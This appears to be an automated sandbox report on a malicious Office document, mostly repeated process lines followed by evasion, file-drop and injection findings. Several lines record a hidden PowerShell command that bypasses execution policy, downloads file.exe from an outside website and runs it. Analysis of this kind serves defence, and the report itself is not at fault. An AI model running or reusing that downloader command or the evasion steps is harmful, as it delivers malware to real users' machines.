Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\file.exeRDTSC instruction interceptor: First address: 0000000007043C85 second address: 0000000007043C85 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4EECA62E1Fh 0x00000006 test ch, FFFFFFD8h 0x00000009 test edx, D75238D0h 0x0000000f inc ebp 0x00000010 test ecx, edx 0x00000012 inc ebx 0x00000013 rdtsc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1580Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1696Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 912Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\file.exeAPI coverage: 8.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,9_2_00405A19
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004065CE FindFirstFileA,FindClose,9_2_004065CE
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004027AA FindFirstFileA,9_2_004027AA
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,16_2_00405A19
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004065CE FindFirstFileA,FindClose,16_2_004065CE
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004027AA FindFirstFileA,16_2_004027AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\file.exeAPI call chain: ExitProcess graph end nodegraph_9-4399
Source: C:\Users\user\AppData\Roaming\file.exeAPI call chain: ExitProcess graph end nodegraph_9-4403
Source: C:\Users\user\AppData\Roaming\file.exeAPI call chain: ExitProcess graph end nodegraph_16-4271
Source: C:\Users\user\AppData\Roaming\file.exeAPI call chain: ExitProcess graph end nodegraph_16-4275
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: file.exe, 00000015.00000002.1283718581.00000000005D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_73C22288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,9_2_73C22288
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

barindex
Injects files into Windows application
Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXEJump to behavior
Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXEJump to behavior
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
